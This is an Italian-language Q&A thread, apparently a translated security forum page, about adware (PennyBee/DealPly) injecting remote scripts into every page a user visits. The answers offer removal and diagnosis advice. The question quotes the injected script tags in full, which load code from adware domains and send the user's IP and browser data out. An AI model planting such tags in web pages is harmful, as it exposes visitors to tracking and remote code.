Quali sono questi URL nei miei browser?

6

Stavo testando la mia applicazione Node.JS . Quando ho aperto la mia app utilizzando Chrome e Mozilla, ho visto questi file JS inclusi in ogni pagina che navigo. Vengono visualizzati in tutti i browser che utilizzo (Firefox, Chrome).

<script type="text/javascript" src="http://j.midnightjs.net/omeltest/common.js?appTitle=PennyBee&amp;channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5"></script><scriptsrc="//q.pricejs.info/e?type=quick&amp;topic=suzan_commonjs&amp;partner=omeltest&amp;channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5&amp;trinity=Z15e3d535a5k&amp;appTitle=PennyBee&amp;opdom=midnightjs.net&amp;instgrp=&amp;rnd=0.5035031025763601&amp;guid=" type="text/javascript"></script>
<script src="//h.midnightjs.net/e?type=heart_bit&amp;partner=omeltest&amp;channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5&amp;trinity=Z15e3d535a5k&amp;appTitle=PennyBee&amp;opdom=midnightjs.net&amp;instgrp=&amp;sset=4&amp;cb=114_9_25&amp;src=midn8&amp;userAgent=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F38.0.2125.104%20Safari%2F537.36" type="text/javascript"></script>
<script src="http://i.omeljs.info/omeltest/javascript.js?channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5&amp;instgrp=&amp;trinity=Z15e3d535a5k"type="text/javascript"></script> 
<script src="http://i.omeljs.info/opt_content.js?v=opt_1412683513880&amp;partner=omeltest&amp;channel=omeltestchkomel68&amp;sset=8&amp;appTitle=&amp;sset=8&amp;ip=5.47.69.10"></script><scriptsrc="http://c.omeljs.info/1507367.js?dn=10.6&amp;isc=0" type="text/javascript" id="__DealPly__222918.92021894455" class="dealply_content_script"></script>

Ho notato che questi collegamenti inviano il mio IP e altri dati a server remoti. È un virus e come posso liberarmene?

    
posta nodejser 25.10.2014 - 13:09
fonte

4 risposte

10

Sembra che il tuo desktop sia stato infettato da PennyBee (aka DealPly, OfferBoulevard, SavingsBull) adware.

In teoria, di solito questo può essere rimosso usando la voce Aggiungi / Rimuovi Programmi e i gestori di estensioni / componenti aggiuntivi in Chrome e Firefox. Tuttavia, se tu fossi inconsapevolmente infetto da questo (probabilmente: tramite il programma di impacchettamento InstallCore / OpenCandy / DownloadAdmin gestito da IronSource / Injekt, parte del gruppo come funziona PennyBee et al), chissà cos'altro è stato installato? Potrebbe essere utile prendere in considerazione una nuova installazione.

    
risposta data 26.10.2014 - 13:45
fonte
0

Sembra un'infezione da browser adware. Questi adware si comportano come Man-in-the-Browser e vengono attivati su determinati eventi come il clic del mouse. Una volta attivato l'evento, genera traffico verso un sito Web arbitrario. Per sbarazzarsi di questo, considera di reinstallare il tuo browser web. Per avere un aspetto più vicino, prova a guardare i diversi plugin installati nel tuo browser. Se si trova un plug-in sospetto installato accidentalmente, disattivarlo immediatamente. Ma questa non sarà una soluzione permanente. Passare a un altro browser che è stato installato prima dell'infezione non sarà d'aiuto in quanto questi programmi di solito si installano su tutti i browser disponibili sulla macchina.

    
risposta data 27.10.2014 - 12:39
fonte
0

Per vedere se questa infezione è più ampia dell'installazione del tuo browser, crea un nuovo utente, naviga su alcuni siti web e verifica se anche il nuovo utente viene infettato. In tal caso, la pulizia del browser non sarà di aiuto.

    
risposta data 27.10.2014 - 13:41
fonte
-1

Non sarei in grado di commentare se il JS agganciato alle tue sessioni di navigazione sia in realtà dannoso o meno, ma posso offrire qualche consiglio che ti darà un maggiore controllo della superficie di attacco del tuo FireFox browser presenta ai potenziali avversari.

Se hai dubbi sull'affidabilità (o meglio sull'intenzione malevola) di un URI, prova a cercarlo su siti come link ( per altri siti che offrono un servizio simile prova a cercare su Google questo: "related: www.virustotal.com").

Inoltre, visto che si tratta di un problema JS; potresti provare a installare il plugin NoScript per FireFox. Questo plugin ti dà il controllo su quali origini del browser è consentito eseguire JS e altri contenuti attivi nel tuo browser. E se sei preoccupato di essere rintracciato e di filtrare dati sulla tua attività in strani siti sconosciuti, potresti provare a utilizzare il plug-in Lightbeam per Firefox.

    
risposta data 25.10.2014 - 16:51
fonte

Leggi altre domande sui tag